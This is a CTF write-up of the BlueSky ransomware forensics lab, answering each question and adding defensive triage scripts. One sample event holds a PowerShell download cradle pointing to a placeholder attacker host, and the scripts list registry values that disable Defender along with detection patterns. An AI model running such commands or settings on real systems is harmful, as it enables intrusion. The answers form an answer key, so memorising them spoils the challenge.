
BlueSky Ransomware Write-up

Praise be to Allah, and peace and blessings be upon the Messenger of Allah, his family and his companions. Now then:


Last updated 6 months ago

Scenario:

As a cybersecurity analyst on SecureTech’s Incident Response Team, you’re tackling an urgent case involving a high-profile corporation that suspects a sophisticated cyber attack on its network. The corporation, which manages critical data across various industries, has experienced a ransomware attack, leading to the encryption of files and an immediate need for expert assistance to mitigate the damages and investigate the breach.

Your role in the team is to conduct a detailed analysis of the evidence to determine the extent and nature of the attack. Your objective is to identify the tactics, techniques, and procedures (TTPs) used by the threat actor to help your client contain the threat and restore the integrity of their network.

Tools:

  • Wireshark

  • Network Miner

  • Windows Event Viewer

  • Event Log Explorer

  • VirusTotal

  • CyberChef

Link: https://cyberdefenders.org/blueteam-ctf-challenges/bluesky-ransomware/

Writeup on Medium: https://medium.com/@GLITCHGC/bluesky-ransomware-write-up-780ca4a0f7fc


Questions:

1. Knowing the source IP of the attack allows security teams to respond to potential threats quickly. Can you identify the source IP responsible for potential port scanning activity?

A quick search through the capture turns it up.

Answer: 87.96.21.84
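
The port-scan source in question 1 can be picked out without eyeballing the whole capture. The block below is an added example, not part of the original write-up or the lab files: it takes the tab-separated output that `tshark` produces for bare SYN packets (the command is shown in the comment), groups connection attempts per source/destination pair, and flags any source that hits many distinct ports on one host inside a short window. The sample output is constructed here; only the scanner IP matches the lab answer.

```python
from collections import defaultdict

# Constructed output in the shape produced by
#   tshark -r capture.pcap -Y "tcp.flags.syn==1 && tcp.flags.ack==0" \
#          -T fields -e frame.time_relative -e ip.src -e ip.dst -e tcp.dstport
# (tab separated). The lab's own capture is not reproduced here.
SAMPLE_TSHARK_OUTPUT = "\n".join(
    [f"{0.01 * i:.3f}\t87.96.21.84\t10.0.0.5\t{port}"
     for i, port in enumerate([21, 22, 23, 25, 80, 135, 139, 443, 445, 1433, 3389])]
    + [
        "5.000\t10.0.0.7\t10.0.0.5\t445",   # ordinary SMB client, single port
        "5.100\t10.0.0.7\t10.0.0.5\t445",
        "6.000\t10.0.0.9\t10.0.0.5\t1433",  # ordinary SQL client
    ]
)


def parse_tshark_tsv(text):
    """Parse the field output above into (time, src, dst, dst_port) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split("\t")
        if len(parts) != 4 or not parts[3]:
            continue  # blank line or a packet without a TCP destination port
        ts, src, dst, port = parts
        records.append((float(ts), src, dst, int(port)))
    return records


def find_port_scanners(records, window=10.0, min_ports=10):
    """Flag sources whose SYNs reach at least `min_ports` distinct ports on one
    host within `window` seconds (a simple vertical-scan heuristic).
    Returns {src_ip: {dst_ip: sorted list of ports}}."""
    attempts = defaultdict(list)
    for ts, src, dst, port in records:
        attempts[(src, dst)].append((ts, port))

    scanners = {}
    for (src, dst), hits in attempts.items():
        hits.sort()
        # Slide a window over the time-ordered attempts for this pair.
        for i, (t0, _) in enumerate(hits):
            ports = {p for t, p in hits[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                scanners.setdefault(src, {})[dst] = sorted(ports)
                break
    return scanners


if __name__ == "__main__":
    for src, targets in find_port_scanners(parse_tshark_tsv(SAMPLE_TSHARK_OUTPUT)).items():
        for dst, ports in targets.items():
            print(f"{src} scanned {dst}: {len(ports)} ports ({ports[0]}..{ports[-1]})")
```

The thresholds are deliberately conservative; on a real capture, tune `window` and `min_ports` to the environment, and remember that a scanner which spreads its probes over hours will slip under a short window.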


2. During the investigation, it’s essential to determine the account targeted by the attacker. Can you identify the targeted account username?

Look at packet number 2641 and inspect the TDS7 Login packet.

Answer: sa


3. We need to determine if the attacker succeeded in gaining access. Can you provide the correct password discovered by the attacker?

Answer: cyb3rd3f3nd3r$


4. Attackers often change some settings to facilitate lateral movement within a network. What setting did the attacker enable to control the target host further and execute further commands?

Answer: xp_cmdshell


5. Process injection is often used by attackers to escalate privileges within a system. What process did the attacker inject the C2 into to gain administrative privileges?

Open Event Viewer and search for Event ID 400 (it is logged when a new PowerShell host process starts).

Answer: winlogon.exe
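
Scrolling through Event ID 400 entries by hand works for a lab, but the same triage can be scripted. The block below is an added example and not from the write-up: it parses events in the XML layout Event Viewer exports, keeps only the PowerShell engine-start events (ID 400), pulls the `HostApplication=` line out of the third `<Data>` element where PowerShell places it, and tags command lines that carry the usual warning signs (hidden window, encoded command, execution-policy bypass, download cradle). The three events are constructed, and the attacker host in the third one is a placeholder.

```python
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed events (not from the lab) in exported Event XML form.
SAMPLE_EVENTS = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="PowerShell"/><EventID>400</EventID>
  <TimeCreated SystemTime="2024-01-10T09:00:00Z"/><EventRecordID>1001</EventRecordID></System>
  <EventData><Data>Available</Data><Data>None</Data><Data>NewEngineState=Available
    PreviousEngineState=None
    HostName=ConsoleHost
    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    EngineVersion=5.1.19041.1</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="PowerShell"/><EventID>403</EventID>
  <TimeCreated SystemTime="2024-01-10T09:05:00Z"/><EventRecordID>1002</EventRecordID></System>
  <EventData><Data>Stopped</Data><Data>Available</Data><Data>NewEngineState=Stopped
    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="PowerShell"/><EventID>400</EventID>
  <TimeCreated SystemTime="2024-01-10T09:07:00Z"/><EventRecordID>1003</EventRecordID></System>
  <EventData><Data>Available</Data><Data>None</Data><Data>NewEngineState=Available
    HostName=ConsoleHost
    HostApplication=powershell -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-HOST-PLACEHOLDER/stage.ps1')
    EngineVersion=5.1.19041.1</Data></EventData>
</Event>
</Events>"""

# (pattern, reason) pairs applied case-insensitively to HostApplication.
SUSPICIOUS_PATTERNS = [
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", "execution policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    (r"-nop\b|-noprofile", "no profile"),
]


def triage_ps_host_events(xml_text):
    """Return [{record, host_app, reasons}] for every Event ID 400 in the export."""
    results = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.find("e:System/e:EventID", NS).text != "400":
            continue
        record = ev.find("e:System/e:EventRecordID", NS).text
        host_app = ""
        for data in ev.findall("e:EventData/e:Data", NS):
            m = re.search(r"HostApplication=(.*)", data.text or "")
            if m:
                host_app = m.group(1).strip()
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, host_app, re.I)]
        results.append({"record": record, "host_app": host_app, "reasons": reasons})
    return results


if __name__ == "__main__":
    for r in triage_ps_host_events(SAMPLE_EVENTS):
        flag = ", ".join(r["reasons"]) or "nothing unusual"
        print(f"record {r['record']}: {flag}\n    {r['host_app']}")
```

A flagged 400 event gives you the process and time to pivot from; the script body itself is usually in the neighbouring 4104 (Script Block Logging) events if that logging is on.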


6. Following privilege escalation, the attacker attempted to download a file. Can you identify the URL of this file downloaded?

Answer: http://87.96.21.84/checking.ps1


7. Understanding which group Security Identifier (SID) the malicious script checks to verify the current user’s privileges can provide insights into the attacker’s intentions. Can you provide the specific Group SID that is being checked?

Open the first file the attacker downloaded and look at its first line.

Answer: S-1-5-32-544


8. Windows Defender plays a critical role in defending against cyber threats. If an attacker disables it, the system becomes more vulnerable to further attacks. What are the registry keys used by the attacker to disable Windows Defender functionalities? Provide them in the same order found.

In the same script, scroll down to the StopAV function.

Answer: DisableAntiSpyware,DisableRoutinelyTakingAction,DisableRealtimeMonitoring,SubmitSamplesConsent,SpynetReporting
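
The five value names in the StopAV function are exactly what a defender should hunt for on other hosts. The block below is an added example, not from the write-up or the lab script: it parses a `.reg` export (the `reg export` / Registry Editor format), collects the dword values under the Windows Defender keys, and reports the ones set to a Defender-weakening value, in file order. The export is constructed; the key paths are the standard policy locations and the lab script may write them elsewhere.

```python
import re

# Constructed .reg export (not from the lab). Paths are the standard
# Defender policy keys; the lab script may target different hives.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware"=dword:00000001
"DisableRoutinelyTakingAction"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection]
"DisableRealtimeMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet]
"SubmitSamplesConsent"=dword:00000002
"SpynetReporting"=dword:00000000
"LocalSettingOverrideSpynetReporting"=dword:00000001
"""

# Value name -> (dword value that weakens Defender, effect)
TAMPER_INDICATORS = {
    "DisableAntiSpyware": (1, "turns off the antimalware engine"),
    "DisableRoutinelyTakingAction": (1, "stops automatic remediation"),
    "DisableRealtimeMonitoring": (1, "turns off real-time protection"),
    "SubmitSamplesConsent": (2, "never submit samples to Microsoft"),
    "SpynetReporting": (0, "disables cloud (MAPS) reporting"),
}


def parse_reg_export(text):
    """Yield (key_path, value_name, int_value) for every dword in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith('"') and key:
            m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})', line)
            if m:
                yield key, m.group(1), int(m.group(2), 16)


def defender_tamper_findings(text):
    """Return [(value_name, key_path, effect)] for Defender-weakening values,
    in the order they appear in the export."""
    findings = []
    for key, name, value in parse_reg_export(text):
        if "Windows Defender" not in key:
            continue
        indicator = TAMPER_INDICATORS.get(name)
        if indicator and value == indicator[0]:
            findings.append((name, key, indicator[1]))
    return findings


if __name__ == "__main__":
    for name, key, effect in defender_tamper_findings(SAMPLE_REG):
        print(f"{name}: {effect}\n    {key}")
```

On a live host the same check is a `reg export "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" defender.reg` followed by running this parser over the file; Defender's own Event ID 5001/5010 entries (real-time protection disabled) corroborate the registry change.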


9. Can you determine the URL of the second file downloaded by the attacker?

Answer: http://87.96.21.84/del.ps1


10. Identifying malicious tasks and understanding how they were used for persistence helps in fortifying defenses against future attacks. What’s the full name of the task created by the attacker to maintain persistence?

Go to packet number 4219 and scroll down to the CleanerETC function.

Answer: \Microsoft\Windows\MUI\LPupdate


11. According to your analysis of the second malicious file, what is the MITRE ID of the tactic the file aims to achieve?

Open the del.ps1 file and search through it, or ask ChatGPT for help.

Answer: TA0005


12. What’s the invoked PowerShell script used by the attacker for dumping credentials?

Answer: invoke-PowerDump.ps1


13. Understanding which credentials have been compromised is essential for assessing the extent of the data breach. What’s the name of the saved text file containing the dumped credentials?

Go to packet number 4273.

Answer: hashes.txt


14. Knowing the hosts targeted during the attacker’s reconnaissance phase, the security team can prioritize their remediation efforts on these specific hosts. What’s the name of the text file containing the discovered hosts?

Answer: extracted_hosts.txt


15. After hash dumping, the attacker attempted to deploy ransomware on the compromised host, spreading it to the rest of the network through previous lateral movement activities using SMB. You’re provided with the ransomware sample for further analysis. By performing behavioral analysis, what’s the name of the ransom note file?

Look the sample up by its hash on ANY.RUN and open the Files tab; the ransom note is listed there.

Answer: DECRYPT FILES BLUESKY


16. In some cases, decryption tools are available for specific ransomware families. Identifying the family name can lead to a potential decryption solution. What’s the name of this ransomware family?

Get the hash of the malware and look it up on VirusTotal.

Answer: conti
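
Hashing the sample and checking it against VirusTotal is the one step here that is worth automating, since you will repeat it for every artifact recovered. The block below is an added example and not from the write-up: it computes the three hashes VirusTotal accepts, queries the v3 `files/{hash}` endpoint with the `x-apikey` header (network access and your own API key assumed), and extracts the crowd-sourced family label and detection ratio from the response. The sample report used for the offline run is constructed, including its label.

```python
import hashlib
import json
import urllib.request
from typing import Optional, Tuple

VT_FILE_ENDPOINT = "https://www.virustotal.com/api/v3/files/"


def file_hashes(data: bytes) -> dict:
    """MD5, SHA-1 and SHA-256 of the sample bytes; any of them keys a VT lookup."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def hash_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return file_hashes(fh.read())


def virustotal_report(file_hash: str, api_key: str) -> dict:
    """Fetch the VT v3 file object for a hash (needs network and a real API key)."""
    req = urllib.request.Request(VT_FILE_ENDPOINT + file_hash,
                                 headers={"x-apikey": api_key})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def threat_label(report: dict) -> Optional[str]:
    """VT's suggested family label, derived from vendor verdicts, if present."""
    attrs = report.get("data", {}).get("attributes", {})
    return attrs.get("popular_threat_classification", {}).get("suggested_threat_label")


def detection_ratio(report: dict) -> Tuple[int, int]:
    """(engines flagging the file as malicious, engines that returned a verdict)."""
    stats = report.get("data", {}).get("attributes", {}).get("last_analysis_stats", {})
    malicious = stats.get("malicious", 0)
    total = sum(stats.get(k, 0) for k in ("malicious", "suspicious", "undetected", "harmless"))
    return malicious, total


# Constructed stand-in for a VT response so the helpers can run offline.
# The label is made up for the example, not copied from VirusTotal.
SAMPLE_REPORT = {"data": {"attributes": {
    "last_analysis_stats": {"malicious": 58, "suspicious": 0, "undetected": 12, "harmless": 0},
    "popular_threat_classification": {"suggested_threat_label": "ransomware.conti/bluesky"},
}}}


if __name__ == "__main__":
    import os, sys
    if len(sys.argv) > 1 and os.environ.get("VT_API_KEY"):
        report = virustotal_report(hash_file(sys.argv[1])["sha256"], os.environ["VT_API_KEY"])
    else:
        report = SAMPLE_REPORT  # offline run
    hits, total = detection_ratio(report)
    print(f"label: {threat_label(report)}  detections: {hits}/{total}")
```

Usage: `VT_API_KEY=... python vt_lookup.py sample.bin`; without a key it prints the constructed report. Hash lookups never upload the file, which matters when the sample may contain victim data.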


You Can Find me Here!

LinkedIn: https://www.linkedin.com/in/glitchgc/

Facebook: https://www.facebook.com/GLITC.GC/

TryHackMe: https://tryhackme.com/p/GLITCH1GC